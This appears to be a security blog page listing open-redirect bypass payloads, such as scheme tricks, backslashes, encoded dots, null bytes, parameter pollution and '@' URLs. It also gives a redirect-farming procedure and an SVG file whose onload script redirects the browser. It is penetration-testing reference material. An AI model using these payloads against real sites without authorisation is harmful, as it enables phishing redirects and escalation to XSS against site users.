caon.io
Toggle Dark/Light/Auto mode Toggle Dark/Light/Auto mode Toggle Dark/Light/Auto mode Back to homepage

Open Redirect

Often a bug that brings impact when chained.

Using “https:” to bypass “//” blacklisted keyword

https:google.com

Using “//” to bypass “http” blacklisted keyword

//google.com

Using /\/ to bypass // blacklisted keyword

\/\/google.com/
/\/google.com/

Using “/" to bypass:

/\google.com

Using “%E3%80%82” to bypass “.” blacklisted character

//google%E3%80%82com

Using null byte “%00” to bypass blacklist filter

//google%00.com

Using parameter pollution

?next=whitelisted.com&next=google.com

Using “@” character, browser will redirect to anything after the “@”

http://[email protected]/

Helpdesk trick

Sometimes a website will redirect only to a helpdesk subdomain, this behavior is interesting because it is possible to create a custom subdomain a place a script that will redirect to an evil website. Making it a open redirect.

Open Redirect farming

  1. If the Applictaion have a user Sign-In/Sign-Up feature, then register a user and log in as the user.
  2. Go to your user profile page , for example : samplesite.me/accounts/profile
  3. Copy the profile page’s URL
  4. Logout and Clear all the cookies and go to the homepage of the site.
  5. Paste the Copied Profile URL on the address bar
  6. If the site prompts for a login , check the address bar , you may find the login page with a redirect parameter like the following
  1. Exploit it or escalate to XSS

Open Redirect uploading svg files

<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.REMOVETHISlocation='http://www.example.com'"
xmlns="http://www.w3.org/2000/svg">
</svg>
</code>

Tools